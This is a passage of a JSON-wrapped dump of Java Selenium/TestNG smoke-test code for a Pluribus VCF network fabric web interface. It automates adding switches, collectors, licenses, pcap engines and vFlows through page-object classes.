switchDropDown;\n\t\n\t@FindBy(how= How.CSS, using = \"div.panel-heading.mirror-head\")\n\tWebElement collectorList;\n\t\n\t@FindBy(how= How.CSS, using = \"span.switch\")\n\tWebElement spanSwitch;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t@FindBy(how= How.CSS, using = \"table-pane\")\n\tWebElement defaultCollectorList;\n\t\n\t/*Widget names for findElement(s) calls */\n\tString authSeedIcon = \"span.icon-img-link.fa.fa-pencil\";\n\tString seedList = \"div[name=form]\";\n\tString licenseList = \"ng-transclude\";\n\tString licenseName = \"ng-transclude div.panel.panel-default\";\n\tString deleteIcon = \"span.icon-img-link.fa fa-trash-o.ng-scope\";\n\tString msgPopup = \"button.close\";\n\tString addButtonCss = \"button.btn.btn-sm.btn-primary\";\n\tString switchListId = \"div.td\";\n\tString instLicKey = \"button.btn-sm.btn-primary\";\n\tString keyTextBox = \"key\";\n\tString collectorListId = \"div.panel-heading.mirror-head\";\n\tString collectorAddButtons = \"button.btn.btn-sm.btn-primary\";\n\tString toggleSwitch = \"span.switch\";\n\tString switchOnState = \"span.toggle-bg.on\";\n\tString switchOffState = \"span.toggle-bg.off\";\n\tString editIcon = \"span.icon-img-link.fa.fa-pencil\";\n\tString collButtonString = \"Add Netvisor Collector\";\n\tString switchListName = \"ul.dropdown-menu li\";\n\tString licenseActivateButton = \"button.btn.btn-xs.btn-primary\";\n\tString seedSwitchAddMsgBox = \"div.modal-dialog\";\n\t\n\tpublic VcfSettingsPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic void vcfSettingsPage() {\n\t\tvcfSettingsIcon.click();\n\t}\n\n\tpublic void addSeedSwitch(String name , String usrname, String mgmtip, String pwd) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(addButton,1000);\n\t\twaitForElementToClick(By.cssSelector(addButtonCss),100);\n\t\tActions actions = new Actions(driver);\n \tactions.moveToElement(addButton).perform();\n\t\tretryingFindClick(addButton);\n\t\twaitForElementVisibility(driver.findElement(By.cssSelector(seedSwitchAddMsgBox)),100);\n\t\tsetValue(mgmtIp,mgmtip);\n\t\tThread.sleep(2000);\n\t\tsetValue(username,usrname);\n\t\tThread.sleep(2000);\n\t\tsetValue(password,pwd);\n\t\tThread.sleep(2000);\n\t\twaitForElementVisibility(okButton,100);\n\t\tretryingFindClick(okButton);\n\t\tThread.sleep(5000);\n\t\twaitForElementVisibility(switchList,1000);\n\t}\n\n\tpublic List getSwitchList() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(switchListName));\n\t\treturn rows;\n\t}\n\n\tpublic boolean isCollectorConfigured(String collName) {\n\t\tboolean isColl = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(collectorListId)).size() != 0);\n\t\t//List<WebElement> collCount = driver.findElements(By.cssSelector(collectorListId));\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\t List <WebElement> collector = driver.findElements(By.cssSelector(collectorListId));\n\t\t\t for (WebElement row:collector) {\n\t\t\t \tif(row.getText().contains(collName)) {\n\t\t\t \t\tisColl = true;\n\t\t\t \t\tcom.jcabi.log.Logger.info(\"collectorConfigured\",\"Collector List:\"+row.getText());\n\t\t\t \t}\n\t\t\t }\t \n\t\t}\n\t\treturn isColl;\n\t}\n\t\n\tpublic boolean checkCollectorState(WebElement collector) {\n\t \tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\t\tboolean existsOn = false;\n\t\t\texistsOn = (collector.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\t\treturn existsOn;\t\n\t}\n\t\n\tpublic boolean editCollector(String collName, String switchName) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(collectorMgmtTab,100);\n\t\tcollectorMgmtTab.click();\n\t\twaitForElementVisibility(collectorList,100);\n\t\tboolean status = false;\n\t\tstatus = isCollectorConfigured(collName);\n\t\tif(status) {\n\t\t\tList <WebElement> collList = driver.findElements(By.cssSelector(collectorListId));\n\t\t\tfor (WebElement coll: collList) {\n\t\t\t\tif(coll.getText().contains(collName)) {\n\t\t\t\t\tboolean currentState = checkCollectorState(coll);\n\t\t\t\t\tif(currentState == false) {\n\t\t\t\t\t\tcoll.findElement(By.cssSelector(editIcon)).click();\n\t\t\t\t\t\tswitchDropDown.click();\n\t\t\t\t\t\tList <WebElement> rows = getSwitchList();\n\t\t\t\t\t\tfor (WebElement row : rows) {\n\t\t\t\t\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\t\t\t\t\trow.click();\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\tretryingFindClick(okButton);\n\t\t\t\t\t\tThread.sleep(10000);\n\t\t\t\t\t\twaitForElementVisibility(driver.findElement(By.cssSelector(toggleSwitch)),100);\n\t\t\t\t\t\tstatus = true;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn true; //No need to edit since the collector is already in running state. Edit will fail at this point.\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} \n\t\treturn status;\n\t}\n\t\n\t\n\tpublic boolean toggleCollState(String collName, boolean expState) throws Exception{\n \tboolean status = false;\n\t\tboolean currentState = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(collectorListId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\tList <WebElement> collList = driver.findElements(By.cssSelector(collectorListId));\n\t\t\tfor (WebElement coll: collList) {\n\t\t\t\tif(coll.getText().contains(collName)) {\n\t\t\t\t\tcurrentState = checkCollectorState(coll); //findCurrentState of the switch\n\t\t\t\t\tif(currentState != expState) {\n\t\t\t\t\t\tcoll.findElement(By.cssSelector(toggleSwitch)).click();\n\t\t\t\t\t\twaitForElementVisibility(confirmOkButton,100);\n\t\t\t\t\t\tconfirmOkButton.click();\n\t\t\t\t\t\tThread.sleep(5000); //waiting for the toggle to go through\n\t\t\t\t\t\twaitForElementVisibility(collectorList,100);\n\t\t\t\t\t\twaitForElementToClick(By.cssSelector(collectorListId),100);\n\t\t\t\t\t}\n\t\t\t\t\tif(expState == checkCollectorState(coll)) status = true;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"toggleCollectorState\",\"No collector configured!\");\n\t\t}\n\t\treturn status;\n }\n\n\tpublic boolean addCollector(String collName, String switchName, String user, String pwd) {\n\t\tboolean status = false;\n\t\tstatus = isCollectorConfigured(collName);\n\t\tif(status==false) {\t\n\t\t\ttry {\n\t\t\tThread.sleep(5000);\n\t\t\t}catch(Exception e){\n\t\t\t\tSystem.out.println(e.toString());\t\t\t\n\t\t\t}\n\t\t\tint i = 0;\n\t\t\tList<WebElement> rows = driver.findElements(By.cssSelector(collectorAddButtons));\n\t\t\tfor (WebElement row: rows) {\n\t\t\t\tif(rows.get(i).getText().contains(collButtonString)) {\n\t\t\t\t\tretryingFindClick(rows.get(i));\n\t\t\t\t}\n\t\t\t\ti++;\n\t\t\t} \n\t\t\tsetValue(name,collName);\n\t\t\twaitForElementVisibility(switchDropDown,1000);\n\t\t\tswitchDropDown.click();\n\t\t\trows = getSwitchList();\n\t\t\t\tfor (WebElement row : rows) {\n\t\t\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\t\t\trow.click();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tokButton.click();\n\t\t\t\twaitForElementVisibility(spanSwitch,100);\n\t\t\t\twaitForElementToClick(By.cssSelector(toggleSwitch),100);\n\t\t\t\tstatus = isCollectorConfigured(collName);\n\t\t}\n\t\treturn status;\n\t}\n\tpublic void authSeedSwitches(String usrname, String pwd) throws InterruptedException {\n\t\twaitForElementVisibility(switchList,1000);\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(authSeedIcon));\n\t\tint i = 0;\n\t\tfor (i = 0; i < rows.size(); i++) {\n\t\t\tif(i == 0) {\n\t\t\t\trows.get(i).click();\n\t\t\t} else {\n\t\t\t\trows = driver.findElements(By.cssSelector(authSeedIcon));\n\t\t\t\trows.get(i).click();\n\t\t\t}\n\t\t\twaitForElementVisibility(username,1000);\n\t\t\tsetValue(username,usrname);\n\t\t\tsetValue(password,pwd);\n\t\t\tokButton.click();\n\t\t\tThread.sleep(5000); //sleeping for authorization to take place\n\t\t\twaitForElementToClick(By.cssSelector(switchListId),100);\n\t\t}\n\t}\t\n \n\tpublic boolean verifySeedSwitch(String name , String usrname, String mgmtip, String pwd) {\n\t\tboolean status = false;\n\t\twaitForElementVisibility(switchList,100);\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\tString rowTable = null;\n\t for (WebElement row : rows) {\n\t \t if (row.getText().contains(name)) {\n\t\t \t com.jcabi.log.Logger.info(\"verifySeedSwitch\", \"Seed switch found:\"+name);\n\t rowTable = row.getText();\n\t status = true;\n\t break;\n\t }\n\t }\n\t\treturn status;\n\t}\n\n\tpublic void sleepFunc (int sec) throws InterruptedException {\n\t\tThread.sleep(sec*1000);\t\n\t}\t\n\tpublic void addDataNode(String name ,String host, String usrname, String size, String pwd) throws InterruptedException {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tdataNodeTab.click();\n\t\tsleepFunc(1);\n\t\taddButton.click();\n\t\tsetValue(nodeName,name);\n\t\tsetValue(nodeHost,host);\t\n\t\tsetValue(username,usrname);\n\t\tsetValue(password,pwd);\n\t\tsudo.click();\n\t\tsetValue(heapsize,size);\n\t\tokButton.click();\n\t\tsleepFunc(4);\n\t\t\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(seedList));\n \twhile(rows.size()==1){\n\t\t\tsleepFunc(4);\n\t\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\t}\n\t\twaitForElementVisibility(switchList,100);\n\t\t//closePopUp();\n\t}\n\t\n\tpublic boolean verifyDataNode(String host) {\t\t\n\t\tboolean status = false;\n\t\tList<WebElement> rows = new ArrayList();\n\t\ttry {\n\t\t\tThread.sleep(4000);\n\t\t} catch (InterruptedException e) {\n\t\t\t// TODO Auto-generated catch block\n\t\t\te.printStackTrace();\n\t\t}\n\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\tString rowTable = null;\n\t for (WebElement row : rows) {\n\t if (row.getText().contains(host)) {\n\t rowTable = row.getText();\n\t status = true;\n\t break;\n\t }\n\t }\n\t\treturn status;\n\t}\n\t\n\tpublic boolean installLicenseKey(String licenseKey) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tlicenseTab.click();\n\t\tdriver.findElement(By.cssSelector(instLicKey)).click();\n\t\twaitForElementVisibility(driver.findElement(By.name(\"form\")),100);\n\t\tsetValue(driver.findElement(By.id(\"key\")),licenseKey);\n\t\tokButton.click();\n\t\tThread.sleep(10000);\n\t\treturn true;\n\t}\n\t\n\tpublic void logintoPnc(String usrname, String pwd) throws Exception {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tlicenseTab.click();\n\t\ttry {\n\t\t\tThread.sleep(1000);\n\t\t} catch (InterruptedException e) {\n\t\t\t// TODO Auto-generated catch block\n\t\t\te.printStackTrace();\n\t\t}\n\t\tpncCloudbutton.click();\n\t\tThread.sleep(2000);\n\t\tsetValue(username,usrname);\n\t\tThread.sleep(2000);\n\t\tsetValue(password,pwd);\n\t\tThread.sleep(2000);\n\t\tokButton.click();\n\t\tThread.sleep(2000);\n\t\twaitForElementVisibility(driver.findElement(By.tagName(licenseList)),100);\n\t\twaitForElementToClick(By.tagName(licenseList),100);\n\t}\n\n\tpublic boolean activateLicense(String usrname, String pwd,LicenseTypes type) throws Exception {\n\t boolean status = false;\n\t\tlogintoPnc(usrname , pwd);\n\t Thread.sleep(10000); \n\t //driver.navigate().refresh();\n\t waitForElementVisibility(listLicense,100);\n\t List<WebElement> rows = new ArrayList();\n\t rows = driver.findElements(By.cssSelector(licenseName));\n\t for (int i=0; i < rows.size(); i++) {\n\t\t rows = driver.findElements(By.cssSelector(licenseName));\n\t if (rows.get(i).getText().contains(type.toString())) {\n\t \tcom.jcabi.log.Logger.info(\"activateLicense\", \"License to be selected:\"+type.toString());\n\t \tActions actions = new Actions(driver);\n\t \tactions.moveToElement(rows.get(i)).perform();\n\t \tretryingFindClick(rows.get(i),By.cssSelector(licenseActivateButton));\n\t status = true;\n\t Thread.sleep(5000); \n\t break;\n\t }\n\t }\n\t if(status == false) {\n\t \t com.jcabi.log.Logger.error(\"activateLicense\",\"Couldn't find license\"+type.toString()+\" for activation\");\n\t } else {\n\t \t closePopUp();\n\t } \n\t return status;\n\t}\n\t\n\tpublic void closePopUp(){\n\t\tList <WebElement> popout = driver.findElements(By.cssSelector(msgPopup));\n\t\tif (popout.size() > 0) {\n\t\t\tdriver.findElement(By.cssSelector(msgPopup)).click();\n\t\t}\n\t}\n\t\n\tpublic void addAuthServer( String pwd, String basedn, String ldapmgmtdn, String ldapuserdnPatterns, String ldapuserSearchFilter, String ldapmanagerPass) {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tserverMenu.click();\n\t\twaitForElementVisibility(AddAuthServer,1000);\n\t\tAddAuthServer.click();\n\t\tsetValue(baseDn,basedn);\n\t\tsetValue(ldapManagerDn,ldapmgmtdn);\n\t\tsetValue(ldapManagerPass,ldapmanagerPass);\n\t\tsetValue(ldapUserDnPatterns,ldapuserdnPatterns);\n\t\tsetValue(ldapUserSearchFilter,ldapuserSearchFilter);\n\t}\n\t\n\tpublic void navigateToSwitchMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tswitchMenu.click();\n\t\twaitForElementVisibility(addButton,40);\n\t}\n\t\n\tpublic void navigateToSystemhealthMenu () {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\thealthMenu.click();\t\n\t\twaitForElementVisibility(healthDetail,100);\n\t}\n\t\n\tpublic void navigateToServerMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tserverMenu.click();\n\t\twaitForElementVisibility(AddAuthServer,40);\n\t}\n\t\n\tpublic String navigateToAppMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tappsMenu.click();\n\t\twaitForElementVisibility(appsDetail,40);\n\t\treturn appsDetail.getText();\n\t}\n\t\n\tpublic String navigateTocertsMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tcertsMenu.click();\n\t\twaitForElementVisibility(certsDetail,40);\n\t\treturn certsDetail.getText();\n\t}\n\t\n\tpublic void navigateToadminMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tadminMenu.click();\n\t\twaitForElementVisibility(addAdmin,40);\t\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.7522165179252625,
"alphanum_fraction": 0.7564162611961365,
"avg_line_length": 38.685184478759766,
"blob_id": "ead624d8a388c89af102772828988a1ff1988b89",
"content_id": "9bef179d4a003bc430f8a1c82e00442bbcc0d9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2143,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 54,
"path": "/src/test/java/com/pluribus/vcf/test/PATest.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.test;\nimport com.pluribus.vcf.helper.TestSetup;\nimport com.pluribus.vcf.pagefactory.VCFLoginPage;\nimport com.pluribus.vcf.pagefactory.VCFHomePage;\nimport com.pluribus.vcf.pagefactory.VCFPaIndexPage;\nimport org.testng.annotations.BeforeClass;\nimport org.testng.annotations.Optional;\nimport org.testng.annotations.Test;\nimport org.testng.annotations.Parameters;\n\npublic class PATest extends TestSetup{\n\tprivate VCFHomePage home1;\n\tprivate VCFPaIndexPage paIndex;\n\tprivate VCFLoginPage login;\n\t\n\t@BeforeClass(alwaysRun = true)\n\tpublic void init() {\n\t\thome1 = new VCFHomePage(getDriver());\n\t\tlogin = new VCFLoginPage(getDriver());\n\t\tpaIndex = new VCFPaIndexPage(getDriver());\n\t}\n\t\n\t@Parameters({\"password\"}) \n\t@Test(alwaysRun = true)\n\tpublic void logintoPA(@Optional(\"test123\") String password) {\n\t\tlogin.login(\"admin\", password);\n\t\thome1.gotoPA();\n\t}\n\t\n\t@Parameters({\"pcapName\",\"vcfIp\"}) \n\t@Test(groups={\"smoke\",\"regression\"}, dependsOnMethods={\"logintoPA\"}, description=\"Add local Pcap\")\n\tpublic void addPcapTest(String vcfIp,@Optional(\"pcap1\") String pcapName) throws Exception{\n\t\tpaIndex.addLocalPcap(pcapName,vcfIp);\n\t\tif(paIndex.verifyPcap(pcapName)) {\n\t\t\tcom.jcabi.log.Logger.info(\"addPcap\",\"Pcap \"+pcapName+\" configured and verified succcessfully\");\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"addPcap\",\"Pcap configuration not successful\");\n\t\t\tthrow new Exception(\"Pcap configuration failed\");\n\t\t}\n\t}\n\t\n\t@Parameters({\"switchName\",\"pcapName\",\"inPort\",\"outPort\",\"flowDuration\",\"flowName\"})\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"addPcapTest\"},description=\"Add vflow\")\n\tpublic void addEnableFlowTest(String switchName, @Optional(\"pcap1\") String pcapName, String inPort, String outPort, String flowDuration, @Optional(\"flow1\") String flowName) throws Exception{\n\t\tpaIndex.addVFlow(flowName,switchName,inPort,outPort,flowDuration,pcapName);\n\t\tif(paIndex.togglevFlowState(flowName)) {\n\t\t\tcom.jcabi.log.Logger.info(\"addVFlowTest\",\"Turned on vflow successfully\");\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"addVFlowTest\",\"Could not turn on vflow\");\n\t\t\tthrow new Exception(\"Vflow turn on failed\");\n\t\t}\n\t}\n\t\n}\n"
},
{
"alpha_fraction": 0.7315146923065186,
"alphanum_fraction": 0.7401292324066162,
"avg_line_length": 25.283018112182617,
"blob_id": "54cc72372ec8ca2b8219857a577cd8c173e55aa6",
"content_id": "fe41fd1ca581b47e5eff682b5d2dd00d0b8e332a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 53,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFHomePage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.pluribus.vcf.helper.PageInfra;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VCFHomePage extends PageInfra{\n\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-cogs\")\n WebElement vcfSettingsIcon;\n\n @FindBy(how = How.CSS, using = \"a.fa.fa-home\")\n WebElement vcfHomeIcon;\n\n @FindBy(how = How.CSS, using = \"div.homelogo.vcf-ia span\")\n\tWebElement vcfIAIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"div.homelogo.vcf-pa span\")\n\tWebElement vcfPAIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"div.homelogo.vcf-mgr span\")\n\tWebElement vcfMgrIcon;\n\t\n\t@FindBy(css = \"a.fa.fa-sign-out\")\n\tWebElement vcfLogout;\n\t\n\tpublic VCFHomePage(WebDriver driver) {\n \tsuper(driver);\n\t}\n\tpublic void waitForHomeLogo() {\n\t\twaitForElementVisibility(vcfIAIcon,100);\n\t}\n\tpublic void gotoIA() {\n\t\twaitForElementVisibility(vcfIAIcon,100);\n\t\tvcfIAIcon.click();\n\t}\t\n\t\t\n\tpublic void gotoPA() {\n\t\twaitForElementVisibility(vcfPAIcon,100);\n\t\tvcfPAIcon.click();\n\t}\n\t\n\tpublic void gotoVCFMgr() {\t\n\t\twaitForElementVisibility(vcfMgrIcon,100);\n\t\tvcfMgrIcon.click();\n\t}\n}\n"
},
{
"alpha_fraction": 0.6955448985099792,
"alphanum_fraction": 0.704866349697113,
"avg_line_length": 28.65447235107422,
"blob_id": "d4a2a2e83f43e6a5b92e1ee3e68adb6a101e604b",
"content_id": "108b615b6d2089fface4f837266cdc0c97d6b694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7295,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 246,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFPaIndexPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.jcabi.ssh.SSHByPassword;\nimport com.jcabi.ssh.Shell;\nimport com.pluribus.vcf.helper.PageInfra;\n\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.concurrent.TimeUnit;\n\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VCFPaIndexPage extends PageInfra {\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.pa-dashboard-menu\")\n\tWebElement dashboardIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.pcap-engine-menu\")\n\tWebElement configIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.vflow-menu\")\n\tWebElement vFlowConfig;\n\t\n\t@FindBy(how = How.CSS, using = \"div.modal-body\")\n\tWebElement pcapAddMenu;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary.btn-sm\")\n\tWebElement fetchButton;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t@FindBy(how = How.NAME, using = \"name\")\n\tWebElement name;\n\t\t\n\t@FindBy(how = How.NAME, using = \"ip\")\n\tWebElement ip;\n\t\n\t@FindBy(how = How.NAME, using = \"port\")\n\tWebElement port;\n\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\t\n\t@FindBy(how = How.ID, using = \"selectedInport\")\n\tWebElement inPortText;\n\t\n\t@FindBy(how = How.ID, using = \"selectedOutport\")\n\tWebElement outPortText;\n\t\n\t@FindBy(how = How.CSS, using = \"div.col-sm-9\")\n\tWebElement interfaceList;\n\t\n\t@FindBy(how = How.CSS, using = \"ng-transclude\")\n\tWebElement pcapList;\n\t\n\t/* Names for findElement(s) methods */\n\tString switchListName = \"ul.dropdown-menu\";\n\tString dropdownName = \"button.btn.btn-default.btn-sm\";\n\tString lblCheckBox = \"label.checkbox\";\n\tString checkBox = \"input.ng-pristine.ng-untouched.ng-valid.ng-empty\";\n\tString pcapNameId = \"div.td span\";\n\tString pcapListId = \"ng-form\";\n\tString flowHeaderId = \"div.panel-heading.mirror-head\";\n\tString flowNameId = \"span.name-ellipsis\";\n\tString toggleSwitch = \"span.switch\";\n\tString switchOnState = \"span.toggle-bg.on\";\n\tString switchOffState = \"span.toggle-bg.off\";\n\t\n\tpublic VCFPaIndexPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic List getSwitchList() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(switchListName));\n\t\treturn rows;\n\t}\n\t\n\tpublic List getDropDownButtons() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(dropdownName));\n\t\treturn rows;\n\t}\n\t\n\tpublic String getEth1Ip(String hostIp) {\n\t\tString eth1Ip = null;\n\t\ttry {\n\t\t\tShell sh1 = new Shell.Verbose(\n\t\t\t\t\tnew SSHByPassword(\n\t\t\t\t\t\t\thostIp,\n\t\t\t\t\t\t\t22,\n\t\t\t\t\t\t\t\"vcf\",\n\t\t\t\t\t\t\t\"changeme\"\n\t\t\t\t\t)\n\t );\n\t\t\tString out1 = new Shell.Plain(sh1).exec(\"ifconfig eth1 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'\");\n\t\t\teth1Ip = out1.trim();\n\t\t}\n\t\tcatch(Exception e) {\n\t\t}\n\t\treturn eth1Ip;\n\t}\n\tpublic void addLocalPcap(String pcapName, String hostIp) {\n\t\tString eth0Ip = hostIp;\n\t\tString eth1Ip = getEth1Ip(hostIp); \n\t\tconfigIcon.click();\n\t\t\n\t\t//Check if pcap by that name already exists. Then skip adding it. \n\t\tif(!verifyPcap(pcapName)) {\n\t\t\twaitForElementVisibility(addButton,1000);\n\t\t\taddButton.click();\n\t\t\twaitForElementVisibility(pcapAddMenu,100);\n\t\t\tsetValue(name,pcapName);\n\t\t\tsetValue(ip,eth1Ip);\n\t\t\tsetValue(port,\"8080\");\n\t\t\tfetchButton.click();\n\t\t\twaitForElementVisibility(interfaceList,100);\n\t\t\tList <WebElement> ifNames = driver.findElements(By.cssSelector(lblCheckBox));\n\t\t\tint index = 0;\n\t\t\tint hitIdx = 0;\n\t\t\tfor (WebElement row: ifNames) {\n\t\t\t\tif(row.getText().contains(\"eth1\")) {\n\t\t\t\t\trow.findElement(By.cssSelector(checkBox)).click();\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tindex++;\n\t\t\t}\n\t\t\tokButton.click();\n\t\t\twaitForElementVisibility(pcapList,100);\n\t\t}\n\t}\n\t\n\tpublic boolean verifyPcap(String pcapName) {\n\t\tboolean status = false; \n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(pcapListId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tList <WebElement> configuredPcaps = null;\n\t\tif(exists) {\n\t\t\tconfiguredPcaps = driver.findElements(By.cssSelector(pcapNameId));\n\t\t\tfor (WebElement row:configuredPcaps) {\n\t\t\t\tif(row.getText().equalsIgnoreCase(pcapName)) {\n\t\t\t\t\tstatus = true;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n \t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic void addVFlow(String flowName,String switchName, String inPort, String outPort, String duration, String pcapName) {\n\t\tvFlowConfig.click();\n\t\twaitForElementVisibility(addButton,1000);\n\t\taddButton.click();\n\t\tsetValue(name,flowName);\n\t\tList <WebElement> dds = getDropDownButtons();\n\t\tdds.get(0).click();\n\t\tList <WebElement> rows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tsetValue(inPortText,inPort);\n\t\tsetValue(outPortText,outPort);\n\t\tdds.get(1).click();\n\t\trows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(duration)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tdds.get(2).click();\n\t\trows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(pcapName)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tokButton.click();\n\t}\n\t\n\tpublic boolean chkCurrentFlowState (WebElement flow) {\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (flow.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\treturn existsOn;\t\n\t}\n\t\n\tpublic boolean chkCurrentFlowState (WebElement flow,boolean expState) {\n\t\tboolean status = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (flow.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(existsOn == expState) {\n\t\t\tstatus = true;\n\t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic boolean togglevFlowState(String flowName) {\n\t\tboolean status = false;\n\t\tboolean currentState = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = 